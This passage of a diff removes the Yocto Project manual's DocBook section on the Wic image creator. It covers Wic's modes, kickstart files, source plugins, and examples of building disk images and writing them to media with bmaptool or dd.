-            variable in the Yocto Project Reference Manual's variable glossary.
-        </para>
-    </section>
-
-    <section id='creating-partitioned-images-using-wic'>
-        <title>Creating Partitioned Images Using Wic</title>
-
-        <para>
-            Creating an image for a particular hardware target using the
-            OpenEmbedded build system does not necessarily mean you can boot
-            that image as is on your device.
-            Physical devices accept and boot images in various ways depending
-            on the specifics of the device.
-            Usually, information about the hardware can tell you what image
-            format the device requires.
-            Should your device require multiple partitions on an SD card, flash,
-            or an HDD, you can use the OpenEmbedded Image Creator,
-	        Wic, to create the properly partitioned image.
-        </para>
-
-        <para>
-            The <filename>wic</filename> command generates partitioned
-            images from existing OpenEmbedded build artifacts.
-            Image generation is driven by partitioning commands
-            contained in an Openembedded kickstart file
-            (<filename>.wks</filename>) specified either directly on
-            the command line or as one of a selection of canned
-            kickstart files as shown with the
-            <filename>wic list images</filename> command in the
-            "<link linkend='using-a-provided-kickstart-file'>Using an Existing Kickstart File</link>"
-            section.
-            When you apply the command to a given set of build
-            artifacts, the result is an image or set of images that
-            can be directly written onto media and used on a particular
-            system.
-            <note>
-                For a kickstart file reference, see the
-                "<ulink url='&YOCTO_DOCS_REF_URL;#ref-kickstart'>OpenEmbedded Kickstart (<filename>.wks</filename>) Reference</ulink>"
-                Chapter in the Yocto Project Reference Manual.
-            </note>
-        </para>
-
-        <para>
-            The <filename>wic</filename> command and the infrastructure
-            it is based on is by definition incomplete.
-            The purpose of the command is to allow the generation of
-            customized images, and as such, was designed to be
-            completely extensible through a plugin interface.
-            See the
-            "<link linkend='wic-using-the-wic-plugin-interface'>Using the Wic PlugIn Interface</link>"
-            section for information on these plugins.
-        </para>
-
-        <para>
-            This section provides some background information on Wic,
-            describes what you need to have in
-            place to run the tool, provides instruction on how to use
-            the Wic utility, provides information on using the Wic plugins
-            interface, and provides several examples that show how to use
-            Wic.
-        </para>
-
-        <section id='wic-background'>
-            <title>Background</title>
-
-            <para>
-                This section provides some background on the Wic utility.
-                While none of this information is required to use
-                Wic, you might find it interesting.
-                <itemizedlist>
-                    <listitem><para>
-                        The name "Wic" is derived from OpenEmbedded
-                        Image Creator (oeic).
-                        The "oe" diphthong in "oeic" was promoted to the
-                        letter "w", because "oeic" is both difficult to
-                        remember and to pronounce.
-                        </para></listitem>
-                    <listitem><para>
-                        Wic is loosely based on the
-                        Meego Image Creator (<filename>mic</filename>)
-                        framework.
-                        The Wic implementation has been
-                        heavily modified to make direct use of OpenEmbedded
-                        build artifacts instead of package installation and
-                        configuration, which are already incorporated within
-                        the OpenEmbedded artifacts.
-                        </para></listitem>
-                    <listitem><para>
-                        Wic is a completely independent
-                        standalone utility that initially provides
-                        easier-to-use and more flexible replacements for an
-                        existing functionality in OE-Core's
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-image-live'><filename>image-live</filename></ulink>
-                        class.
-                        The difference between Wic and those examples is
-                        that with Wic the functionality of those scripts is
-                        implemented by a general-purpose partitioning language,
-                        which is based on Redhat kickstart syntax.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='wic-requirements'>
-            <title>Requirements</title>
-
-            <para>
-                In order to use the Wic utility with the OpenEmbedded Build
-                system, your system needs to meet the following
-                requirements:
-                <itemizedlist>
-                    <listitem><para>
-                        The Linux distribution on your development host must
-                        support the Yocto Project.
-                        See the
-                        "<ulink url='&YOCTO_DOCS_REF_URL;#detailed-supported-distros'>Supported Linux Distributions</ulink>"
-                        section in the Yocto Project Reference Manual for
-                        the list of distributions that support the
-                        Yocto Project.
-                        </para></listitem>
-                    <listitem><para>
-                        The standard system utilities, such as
-                        <filename>cp</filename>, must be installed on your
-                        development host system.
-                        </para></listitem>
-                    <listitem><para>
-                        You must have sourced the build environment
-                        setup script (i.e.
-                        <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>)
-                        found in the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                        </para></listitem>
-                    <listitem><para>
-                        You need to have the build artifacts already
-                        available, which typically means that you must
-                        have already created an image using the
-                        Openembedded build system (e.g.
-                        <filename>core-image-minimal</filename>).
-                        While it might seem redundant to generate an image
-                        in order to create an image using
-                        Wic, the current version of
-                        Wic requires the artifacts
-                        in the form generated by the OpenEmbedded build
-                        system.
-                        </para></listitem>
-                    <listitem><para>
-                        You must build several native tools, which are
-                        built to run on the build system:
-                        <literallayout class='monospaced'>
-     $ bitbake parted-native dosfstools-native mtools-native
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        Include "wic" as part of the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></ulink>
-                        variable.
-                        </para></listitem>
-                    <listitem><para>
-                        Include the name of the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#openembedded-kickstart-wks-reference'>wic kickstart file</ulink>
-                        as part of the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-WKS_FILE'><filename>WKS_FILE</filename></ulink>
-                        variable
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='wic-getting-help'>
-            <title>Getting Help</title>
-
-            <para>
-                You can get general help for the <filename>wic</filename>
-                command by entering the <filename>wic</filename> command
-                by itself or by entering the command with a help argument
-                as follows:
-                <literallayout class='monospaced'>
-     $ wic -h
-     $ wic --help
-     $ wic help
-                </literallayout>
-            </para>
-
-            <para>
-                Currently, Wic supports seven commands:
-                <filename>cp</filename>, <filename>create</filename>,
-                <filename>help</filename>, <filename>list</filename>,
-                <filename>ls</filename>, <filename>rm</filename>, and
-                <filename>write</filename>.
-                You can get help for all these commands except "help" by
-                using the following form:
-                <literallayout class='monospaced'>
-     $ wic help <replaceable>command</replaceable>
-                </literallayout>
-                For example, the following command returns help for the
-                <filename>write</filename> command:
-                <literallayout class='monospaced'>
-     $ wic help write
-                </literallayout>
-            </para>
-
-            <para>
-                Wic supports help for three topics:
-                <filename>overview</filename>,
-                <filename>plugins</filename>, and
-                <filename>kickstart</filename>.
-                You can get help for any topic using the following form:
-                <literallayout class='monospaced'>
-     $ wic help <replaceable>topic</replaceable>
-                </literallayout>
-                For example, the following returns overview help for Wic:
-                <literallayout class='monospaced'>
-     $ wic help overview
-                </literallayout>
-            </para>
-
-            <para>
-                One additional level of help exists for Wic.
-                You can get help on individual images through the
-                <filename>list</filename> command.
-                You can use the <filename>list</filename> command to return the
-                available Wic images as follows:
-                <literallayout class='monospaced'>
-     $ wic list images
-       genericx86                    		Create an EFI disk image for genericx86*
-       beaglebone-yocto              		Create SD card image for Beaglebone
-       edgerouter                    		Create SD card image for Edgerouter
-       qemux86-directdisk            		Create a qemu machine 'pcbios' direct disk image
-       directdisk-gpt                		Create a 'pcbios' direct disk image
-       mkefidisk                     		Create an EFI disk image
-       directdisk                    		Create a 'pcbios' direct disk image
-       systemd-bootdisk              		Create an EFI disk image with systemd-boot
-       mkhybridiso                   		Create a hybrid ISO image
-       sdimage-bootpart              		Create SD card image with a boot partition
-       directdisk-multi-rootfs       		Create multi rootfs image using rootfs plugin
-       directdisk-bootloader-config  		Create a 'pcbios' direct disk image with custom bootloader config
-                </literallayout>
-                Once you know the list of available Wic images, you can use
-                <filename>help</filename> with the command to get help on a
-                particular image.
-                For example, the following command returns help on the
-                "beaglebone-yocto" image:
-                <literallayout class='monospaced'>
-     $ wic list beaglebone-yocto help
-
-
-     Creates a partitioned SD card image for Beaglebone.
-     Boot files are located in the first vfat partition.
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='operational-modes'>
-            <title>Operational Modes</title>
-
-            <para>
-                You can use Wic in two different
-                modes, depending on how much control you need for
-                specifying the Openembedded build artifacts that are
-                used for creating the image: Raw and Cooked:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>Raw Mode:</emphasis>
-                        You explicitly specify build artifacts through
-                        Wic command-line arguments.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Cooked Mode:</emphasis>
-                        The current
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
-                        setting and image name are used to automatically
-                        locate and provide the build artifacts.
-                        You just supply a kickstart file and the name
-                        of the image from which to use artifacts.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                Regardless of the mode you use, you need to have the build
-                artifacts ready and available.
-            </para>
-
-            <section id='raw-mode'>
-                <title>Raw Mode</title>
-
-                <para>
-                    Running Wic in raw mode allows you to specify all the
-                    partitions through the <filename>wic</filename>
-                    command line.
-                    The primary use for raw mode is if you have built
-                    your kernel outside of the Yocto Project
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                    In other words, you can point to arbitrary kernel,
-                    root filesystem locations, and so forth.
-                    Contrast this behavior with cooked mode where Wic
-                    looks in the Build Directory (e.g.
-                    <filename>tmp/deploy/images/</filename><replaceable>machine</replaceable>).
-                </para>
-
-                <para>
-                    The general form of the
-                    <filename>wic</filename> command in raw mode is:
-                    <literallayout class='monospaced'>
-     $ wic create <replaceable>wks_file</replaceable> <replaceable>options</replaceable> ...
-
-       Where:
-
-          <replaceable>wks_file</replaceable>:
-             An OpenEmbedded kickstart file.  You can provide
-             your own custom file or use a file from a set of
-             existing files as described by further options.
-
-          optional arguments:
-            -h, --help            show this help message and exit
-            -o <replaceable>OUTDIR</replaceable>, --outdir <replaceable>OUTDIR</replaceable>
-                                  name of directory to create image in
-            -e <replaceable>IMAGE_NAME</replaceable>, --image-name <replaceable>IMAGE_NAME</replaceable>
-                                  name of the image to use the artifacts from e.g. core-
-                                  image-sato
-            -r <replaceable>ROOTFS_DIR</replaceable>, --rootfs-dir <replaceable>ROOTFS_DIR</replaceable>
-                                  path to the /rootfs dir to use as the .wks rootfs
-                                  source
-            -b <replaceable>BOOTIMG_DIR</replaceable>, --bootimg-dir <replaceable>BOOTIMG_DIR</replaceable>
-                                  path to the dir containing the boot artifacts (e.g.
-                                  /EFI or /syslinux dirs) to use as the .wks bootimg
-                                  source
-            -k <replaceable>KERNEL_DIR</replaceable>, --kernel-dir <replaceable>KERNEL_DIR</replaceable>
-                                  path to the dir containing the kernel to use in the
-                                  .wks bootimg
-            -n <replaceable>NATIVE_SYSROOT</replaceable>, --native-sysroot <replaceable>NATIVE_SYSROOT</replaceable>
-                                  path to the native sysroot containing the tools to use
-                                  to build the image
-            -s, --skip-build-check
-                                  skip the build check
-            -f, --build-rootfs    build rootfs
-            -c {gzip,bzip2,xz}, --compress-with {gzip,bzip2,xz}
-                                  compress image with specified compressor
-            -m, --bmap            generate .bmap
-            --no-fstab-update     Do not change fstab file.
-            -v <replaceable>VARS_DIR</replaceable>, --vars <replaceable>VARS_DIR</replaceable>
-                                  directory with &lt;image&gt;.env files that store bitbake
-                                  variables
-            -D, --debug           output debug information
-                    </literallayout>
-                    <note>
-                        You do not need root privileges to run
-                        Wic.
-                        In fact, you should not run as root when using the
-                        utility.
-                    </note>
-                </para>
-            </section>
-
-            <section id='cooked-mode'>
-                <title>Cooked Mode</title>
-
-                <para>
-                    Running Wic in cooked mode leverages off artifacts in
-                    the Build Directory.
-                    In other words, you do not have to specify kernel or
-                    root filesystem locations as part of the command.
-                    All you need to provide is a kickstart file and the
-                    name of the image from which to use artifacts by using
-                    the "-e" option.
-                    Wic looks in the Build Directory (e.g.
-                    <filename>tmp/deploy/images/</filename><replaceable>machine</replaceable>)
-                    for artifacts.
-                </para>
-
-                <para>
-                    The general form of the <filename>wic</filename>
-                    command using Cooked Mode is as follows:
-                    <literallayout class='monospaced'>
-     $ wic create <replaceable>wks_file</replaceable> -e <replaceable>IMAGE_NAME</replaceable>
-
-       Where:
-
-          <replaceable>wks_file</replaceable>:
-             An OpenEmbedded kickstart file.  You can provide
-             your own custom file or use a file from a set of
-             existing files provided with the Yocto Project
-             release.
-
-          required argument:
-             -e <replaceable>IMAGE_NAME</replaceable>, --image-name <replaceable>IMAGE_NAME</replaceable>
-                                  name of the image to use the artifacts from e.g. core-
-                                  image-sato
-                    </literallayout>
-                </para>
-            </section>
-        </section>
-
-        <section id='using-a-provided-kickstart-file'>
-            <title>Using an Existing Kickstart File</title>
-
-            <para>
-                If you do not want to create your own kickstart file, you
-                can use an existing file provided by the Wic installation.
-                As shipped, kickstart files can be found in the
-                Yocto Project
-                <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
-                in the following two locations:
-                <literallayout class='monospaced'>
-     poky/meta-yocto-bsp/wic
-     poky/scripts/lib/wic/canned-wks
-                </literallayout>
-                Use the following command to list the available kickstart
-                files:
-                <literallayout class='monospaced'>
-     $ wic list images
-       genericx86                    		Create an EFI disk image for genericx86*
-       beaglebone-yocto              		Create SD card image for Beaglebone
-       edgerouter                    		Create SD card image for Edgerouter
-       qemux86-directdisk            		Create a qemu machine 'pcbios' direct disk image
-       directdisk-gpt                		Create a 'pcbios' direct disk image
-       mkefidisk                     		Create an EFI disk image
-       directdisk                    		Create a 'pcbios' direct disk image
-       systemd-bootdisk              		Create an EFI disk image with systemd-boot
-       mkhybridiso                   		Create a hybrid ISO image
-       sdimage-bootpart              		Create SD card image with a boot partition
-       directdisk-multi-rootfs       		Create multi rootfs image using rootfs plugin
-       directdisk-bootloader-config  		Create a 'pcbios' direct disk image with custom bootloader config
-                </literallayout>
-                When you use an existing file, you do not have to use the
-                <filename>.wks</filename> extension.
-                Here is an example in Raw Mode that uses the
-                <filename>directdisk</filename> file:
-                <literallayout class='monospaced'>
-     $ wic create directdisk -r <replaceable>rootfs_dir</replaceable> -b <replaceable>bootimg_dir</replaceable> \
-           -k <replaceable>kernel_dir</replaceable> -n <replaceable>native_sysroot</replaceable>
-                </literallayout>
-            </para>
-
-            <para>
-                Here are the actual partition language commands
-                used in the <filename>genericx86.wks</filename> file to
-                generate an image:
-                <literallayout class='monospaced'>
-     # short-description: Create an EFI disk image for genericx86*
-     # long-description: Creates a partitioned EFI disk image for genericx86* machines
-     part /boot --source bootimg-efi --sourceparams="loader=grub-efi" --ondisk sda --label msdos --active --align 1024
-     part / --source rootfs --ondisk sda --fstype=ext4 --label platform --align 1024 --use-uuid
-     part swap --ondisk sda --size 44 --label swap1 --fstype=swap
-
-     bootloader --ptable gpt --timeout=5 --append="rootfstype=ext4 console=ttyS0,115200 console=tty0"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='wic-using-the-wic-plugin-interface'>
-            <title>Using the Wic Plugin Interface</title>
-
-            <para>
-                You can extend and specialize Wic functionality by using
-                Wic plugins.
-                This section explains the Wic plugin interface.
-                <note>
-                    Wic plugins consist of "source" and "imager" plugins.
-                    Imager plugins are beyond the scope of this section.
-                </note>
-            </para>
-
-            <para>
-                Source plugins provide a mechanism to customize partition
-                content during the Wic image generation process.
-                You can use source plugins to map values that you specify
-                using <filename>--source</filename> commands in kickstart
-                files (i.e. <filename>*.wks</filename>) to a plugin
-                implementation used to populate a given partition.
-                <note>
-                    If you use plugins that have build-time dependencies
-                    (e.g. native tools, bootloaders, and so forth)
-                    when building a Wic image, you need to specify those
-                    dependencies using the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-WKS_FILE_DEPENDS'><filename>WKS_FILE_DEPENDS</filename></ulink>
-                    variable.
-                </note>
-            </para>
-
-            <para>
-                Source plugins are subclasses defined in plugin files.
-                As shipped, the Yocto Project provides several plugin
-                files.
-                You can see the source plugin files that ship with the
-                Yocto Project
-                <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/scripts/lib/wic/plugins/source'>here</ulink>.
-                Each of these plugin files contains source plugins that
-                are designed to populate a specific Wic image partition.
-            </para>
-
-            <para>
-                Source plugins are subclasses of the
-                <filename>SourcePlugin</filename> class, which is
-                defined in the
-                <filename>poky/scripts/lib/wic/pluginbase.py</filename>
-                file.
-                For example, the <filename>BootimgEFIPlugin</filename>
-                source plugin found in the
-                <filename>bootimg-efi.py</filename> file is a subclass of
-                the <filename>SourcePlugin</filename> class, which is found
-                in the <filename>pluginbase.py</filename> file.
-            </para>
-
-            <para>
-                You can also implement source plugins in a layer outside
-                of the Source Repositories (external layer).
-                To do so, be sure that your plugin files are located in
-                a directory whose path is
-                <filename>scripts/lib/wic/plugins/source/</filename>
-                within your external layer.
-                When the plugin files are located there, the source
-                plugins they contain are made available to Wic.
-            </para>
-
-            <para>
-                When the Wic implementation needs to invoke a
-                partition-specific implementation, it looks for the plugin
-                with the same name as the <filename>--source</filename>
-                parameter used in the kickstart file given to that
-                partition.
-                For example, if the partition is set up using the following
-                command in a kickstart file:
-                <literallayout class='monospaced'>
-     part /boot --source bootimg-pcbios --ondisk sda --label boot --active --align 1024
-                </literallayout>
-                The methods defined as class members of the matching
-                source plugin (i.e. <filename>bootimg-pcbios</filename>)
-                in the <filename>bootimg-pcbios.py</filename> plugin file
-                are used.
-            </para>
-
-            <para>
-                To be more concrete, here is the corresponding plugin
-                definition from the <filename>bootimg-pcbios.py</filename>
-                file for the previous command along with an example
-                method called by the Wic implementation when it needs to
-                prepare a partition using an implementation-specific
-                function:
-                <literallayout class='monospaced'>
-                  .
-                  .
-                  .
-     class BootimgPcbiosPlugin(SourcePlugin):
-         """
-         Create MBR boot partition and install syslinux on it.
-         """
-
-         name = 'bootimg-pcbios'
-                  .
-                  .
-                  .
-         @classmethod
-         def do_prepare_partition(cls, part, source_params, creator, cr_workdir,
-                                  oe_builddir, bootimg_dir, kernel_dir,
-                                  rootfs_dir, native_sysroot):
-             """
-             Called to do the actual content population for a partition i.e. it
-             'prepares' the partition to be incorporated into the image.
-             In this case, prepare content for legacy bios boot partition.
-             """
-                  .
-                  .
-                  .
-                </literallayout>
-                If a subclass (plugin) itself does not implement a
-                particular function, Wic locates and uses the default
-                version in the superclass.
-                It is for this reason that all source plugins are derived
-                from the <filename>SourcePlugin</filename> class.
-            </para>
-
-            <para>
-                The <filename>SourcePlugin</filename> class defined in
-                the <filename>pluginbase.py</filename> file defines
-                a set of methods that source plugins can implement or
-                override.
-                Any plugins (subclass of
-                <filename>SourcePlugin</filename>) that do not implement
-                a particular method inherit the implementation of the
-                method from the <filename>SourcePlugin</filename> class.
-                For more information, see the
-                <filename>SourcePlugin</filename> class in the
-                <filename>pluginbase.py</filename> file for details:
-            </para>
-
-            <para>
-                The following list describes the methods implemented in the
-                <filename>SourcePlugin</filename> class:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis><filename>do_prepare_partition()</filename>:</emphasis>
-                        Called to populate a partition with actual content.
-                        In other words, the method prepares the final
-                        partition image that is incorporated into the
-                        disk image.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>do_configure_partition()</filename>:</emphasis>
-                        Called before
-                        <filename>do_prepare_partition()</filename> to
-                        create custom configuration files for a partition
-                        (e.g. syslinux or grub configuration files).
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>do_install_disk()</filename>:</emphasis>
-                        Called after all partitions have been prepared and
-                        assembled into a disk image.
-                        This method provides a hook to allow finalization
-                        of a disk image (e.g. writing an MBR).
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>do_stage_partition()</filename>:</emphasis>
-                        Special content-staging hook called before
-                        <filename>do_prepare_partition()</filename>.
-                        This method is normally empty.</para>
-
-                        <para>Typically, a partition just uses the passed-in
-                        parameters (e.g. the unmodified value of
-                        <filename>bootimg_dir</filename>).
-                        However, in some cases, things might need to be
-                        more tailored.
-                        As an example, certain files might additionally
-                        need to be taken from
-                        <filename>bootimg_dir + /boot</filename>.
-                        This hook allows those files to be staged in a
-                        customized fashion.
-                        <note>
-                            <filename>get_bitbake_var()</filename>
-                            allows you to access non-standard variables
-                            that you might want to use for this
-                            behavior.
-                        </note>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                You can extend the source plugin mechanism.
-                To add more hooks, create more source plugin methods
-                within <filename>SourcePlugin</filename> and the
-                corresponding derived subclasses.
-                The code that calls the plugin methods uses the
-                <filename>plugin.get_source_plugin_methods()</filename>
-                function to find the method or methods needed by the call.
-                Retrieval of those methods is accomplished by filling up
-                a dict with keys that contain the method names of interest.
-                On success, these will be filled in with the actual
-                methods.
-                See the Wic implementation for examples and details.
-            </para>
-        </section>
-
-        <section id='wic-usage-examples'>
-            <title>Examples</title>
-
-            <para>
-                This section provides several examples that show how to use
-                the Wic utility.
-                All the examples assume the list of requirements in the
-                "<link linkend='wic-requirements'>Requirements</link>"
-                section have been met.
-                The examples assume the previously generated image is
-                <filename>core-image-minimal</filename>.
-            </para>
-
-            <section id='generate-an-image-using-a-provided-kickstart-file'>
-                <title>Generate an Image using an Existing Kickstart File</title>
-
-                <para>
-                    This example runs in Cooked Mode and uses the
-                    <filename>mkefidisk</filename> kickstart file:
-                    <literallayout class='monospaced'>
-     $ wic create mkefidisk -e core-image-minimal
-     INFO: Building wic-tools...
-               .
-               .
-               .
-     INFO: The new image(s) can be found here:
-       ./mkefidisk-201804191017-sda.direct
-
-     The following build artifacts were used to create the image(s):
-       ROOTFS_DIR:                   /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/rootfs
-       BOOTIMG_DIR:                  /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share
-       KERNEL_DIR:                   /home/stephano/build/master/build/tmp-glibc/deploy/images/qemux86
-       NATIVE_SYSROOT:               /home/stephano/build/master/build/tmp-glibc/work/i586-oe-linux/wic-tools/1.0-r0/recipe-sysroot-native
-
-     INFO: The image(s) were created using OE kickstart file:
-       /home/stephano/build/master/openembedded-core/scripts/lib/wic/canned-wks/mkefidisk.wks
-                    </literallayout>
-                    The previous example shows the easiest way to create
-                    an image by running in cooked mode and supplying
-                    a kickstart file and the "-e" option to point to the
-                    existing build artifacts.
-                    Your <filename>local.conf</filename> file needs to have
-                    the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
-                    variable set to the machine you are using, which is
-                    "qemux86" in this example.
-                </para>
-
-                <para>
-                    Once the image builds, the output provides image
-                    location, artifact use, and kickstart file information.
-                    <note>
-                        You should always verify the details provided in the
-                        output to make sure that the image was indeed
-                        created exactly as expected.
-                    </note>
-                </para>
-
-                <para>
-                    Continuing with the example, you can now write the
-                    image from the Build Directory onto a USB stick, or
-                    whatever media for which you built your image, and boot
-                    from the media.
-                    You can write the image by using
-                    <filename>bmaptool</filename> or
-                    <filename>dd</filename>:
-                    <literallayout class='monospaced'>
-     $ oe-run-native bmaptool copy mkefidisk-201804191017-sda.direct /dev/sd<replaceable>X</replaceable>
-                    </literallayout>
-                    or
-                    <literallayout class='monospaced'>
-     $ sudo dd if=mkefidisk-201804191017-sda.direct of=/dev/sd<replaceable>X</replaceable>
-                    </literallayout>
-                    <note>
-                        For more information on how to use the
-                        <filename>bmaptool</filename> to flash a device
-                        with an image, see the
-                        "<link linkend='flashing-images-using-bmaptool'>Flashing Images Using <filename>bmaptool</filename></link>"
-                        section.
-                    </note>
-                </para>
-            </section>
-
-            <section id='using-a-modified-kickstart-file'>
-                <title>Using a Modified Kickstart File</title>
-
-                <para>
-                    Because partitioned image creation is driven by the
-                    kickstart file, it is easy to affect image creation by
-                    changing the parameters in the file.
-                    This next example demonstrates that through modification
-                    of the <filename>directdisk-gpt</filename> kickstart
-                    file.
-                </para>
-
-                <para>
-                    As mentioned earlier, you can use the command
-                    <filename>wic list images</filename> to show the list
-                    of existing kickstart files.
-                    The directory in which the
-                    <filename>directdisk-gpt.wks</filename> file resides is
-                    <filename>scripts/lib/image/canned-wks/</filename>,
-                    which is located in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                    (e.g. <filename>poky</filename>).
-                    Because available files reside in this directory,
-                    you can create and add your own custom files to the
-                    directory.
-                    Subsequent use of the
-                    <filename>wic list images</filename> command would then
-                    include your kickstart files.
-                </para>
-
-                <para>
-                    In this example, the existing
-                    <filename>directdisk-gpt</filename> file already does
-                    most of what is needed.
-                    However, for the hardware in this example, the image
-                    will need to boot from <filename>sdb</filename> instead
-                    of <filename>sda</filename>, which is what the
-                    <filename>directdisk-gpt</filename> kickstart file
-                    uses.
-                </para>
-
-                <para>
-                    The example begins by making a copy of the
-                    <filename>directdisk-gpt.wks</filename> file in the
-                    <filename>scripts/lib/image/canned-wks</filename>
-                    directory and then by changing the lines that specify
-                    the target disk from which to boot.
-                    <literallayout class='monospaced'>
-     $ cp /home/stephano/poky/scripts/lib/wic/canned-wks/directdisk-gpt.wks \
-          /home/stephano/poky/scripts/lib/wic/canned-wks/directdisksdb-gpt.wks
-                    </literallayout>
-                    Next, the example modifies the
-                    <filename>directdisksdb-gpt.wks</filename> file and
-                    changes all instances of
-                    "<filename>--ondisk sda</filename>" to
-                    "<filename>--ondisk sdb</filename>".
-                    The example changes the following two lines and leaves
-                    the remaining lines untouched:
-                    <literallayout class='monospaced'>
-     part /boot --source bootimg-pcbios --ondisk sdb --label boot --active --align 1024
-     part / --source rootfs --ondisk sdb --fstype=ext4 --label platform --align 1024 --use-uuid
-                    </literallayout>
-                    Once the lines are changed, the example generates the
-                    <filename>directdisksdb-gpt</filename> image.
-                    The command points the process at the
-                    <filename>core-image-minimal</filename> artifacts for
-                    the Next Unit of Computing (nuc)
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
-                    the <filename>local.conf</filename>.
-                    <literallayout class='monospaced'>
-     $ wic create directdisksdb-gpt -e core-image-minimal
-     INFO: Building wic-tools...
-                .
-                .
-                .
-     Initialising tasks: 100% |#######################################| Time: 0:00:01
-     NOTE: Executing SetScene Tasks
-     NOTE: Executing RunQueue Tasks
-     NOTE: Tasks Summary: Attempted 1161 tasks of which 1157 didn't need to be rerun and all succeeded.
-     INFO: Creating image(s)...
-
-     INFO: The new image(s) can be found here:
-       ./directdisksdb-gpt-201710090938-sdb.direct
-
-     The following build artifacts were used to create the image(s):
-       ROOTFS_DIR:                   /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/rootfs
-       BOOTIMG_DIR:                  /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share
-       KERNEL_DIR:                   /home/stephano/build/master/build/tmp-glibc/deploy/images/qemux86
-       NATIVE_SYSROOT:               /home/stephano/build/master/build/tmp-glibc/work/i586-oe-linux/wic-tools/1.0-r0/recipe-sysroot-native
-
-     INFO: The image(s) were created using OE kickstart file:
-       /home/stephano/poky/scripts/lib/wic/canned-wks/directdisksdb-gpt.wks
-                    </literallayout>
-                    Continuing with the example, you can now directly
-                    <filename>dd</filename> the image to a USB stick, or
-                    whatever media for which you built your image,
-                    and boot the resulting media:
-                    <literallayout class='monospaced'>
-     $ sudo dd if=directdisksdb-gpt-201710090938-sdb.direct of=/dev/sdb
-     140966+0 records in
-     140966+0 records out
-     72174592 bytes (72 MB, 69 MiB) copied, 78.0282 s, 925 kB/s
-     $ sudo eject /dev/sdb
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='using-a-modified-kickstart-file-and-running-in-raw-mode'>
-                <title>Using a Modified Kickstart File and Running in Raw Mode</title>
-
-                <para>
-                    This next example manually specifies each build artifact
-                    (runs in Raw Mode) and uses a modified kickstart file.
-                    The example also uses the <filename>-o</filename> option
-                    to cause Wic to create the output
-                    somewhere other than the default output directory,
-                    which is the current directory:
-                    <literallayout class='monospaced'>
-     $ wic create /home/stephano/my_yocto/test.wks -o /home/stephano/testwic \
-          --rootfs-dir /home/stephano/build/master/build/tmp/work/qemux86-poky-linux/core-image-minimal/1.0-r0/rootfs \
-          --bootimg-dir /home/stephano/build/master/build/tmp/work/qemux86-poky-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share \
-          --kernel-dir /home/stephano/build/master/build/tmp/deploy/images/qemux86 \
-          --native-sysroot /home/stephano/build/master/build/tmp/work/i586-poky-linux/wic-tools/1.0-r0/recipe-sysroot-native
-
-     INFO: Creating image(s)...
-
-     INFO: The new image(s) can be found here:
-       /home/stephano/testwic/test-201710091445-sdb.direct
-
-     The following build artifacts were used to create the image(s):
-       ROOTFS_DIR:                   /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/rootfs
-       BOOTIMG_DIR:                  /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share
-       KERNEL_DIR:                   /home/stephano/build/master/build/tmp-glibc/deploy/images/qemux86
-       NATIVE_SYSROOT:               /home/stephano/build/master/build/tmp-glibc/work/i586-oe-linux/wic-tools/1.0-r0/recipe-sysroot-native
-
-     INFO: The image(s) were created using OE kickstart file:
-       /home/stephano/my_yocto/test.wks
-                    </literallayout>
-                    For this example,
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
-                    did not have to be specified in the
-                    <filename>local.conf</filename> file since the
-                    artifact is manually specified.
-                </para>
-            </section>
-
-            <section id='using-wic-to-manipulate-an-image'>
-                <title>Using Wic to Manipulate an Image</title>
-
-                <para>
-                    Wic image manipulation allows you to shorten turnaround
-                    time during image development.
-                    For example, you can use Wic to delete the kernel partition
-                    of a Wic image and then insert a newly built kernel.
-                    This saves you time from having to rebuild the entire image
-                    each time you modify the kernel.
-                    <note>
-                        In order to use Wic to manipulate a Wic image as in
-                        this example, your development machine must have the
-                        <filename>mtools</filename> package installed.
-                    </note>
-                </para>
-
-                <para>
-                    The following example examines the contents of the Wic
